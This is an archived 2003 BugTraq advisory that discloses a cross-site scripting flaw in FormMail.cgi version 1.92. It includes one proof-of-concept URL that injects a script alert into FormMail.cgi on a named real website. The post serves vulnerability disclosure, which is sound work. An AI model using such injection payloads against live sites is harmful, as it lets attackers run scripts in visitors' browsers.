BugTraq
XSS (Cross Site Scripting) on FormMail.CGI Jan 11 2003 04:50PM
Rynho Zeros Web (hackargentino gmx net) (1 replies)
#############################################################

Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html

By XyborG - xyborg (at) bigfoot (dot) com [email concealed] - http://www.rzweb.com.ar/

#############################################################

Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.

The operation is simple. To see example:

http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorr
y,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n\nCyervo_Lamos...");</scri
pt>

Duh!

#############################################################

Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html

By XyborG - xyborg (at) bigfoot (dot) com [email concealed] - http://www.rzweb.com.ar/

#############################################################

--
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!

[ reply ]
Re: XSS (Cross Site Scripting) on FormMail.CGI Jan 21 2003 03:04AM
Scott Buchanan (scott buchanan axe net au)


 

Privacy Statement
Copyright 2010, SecurityFocus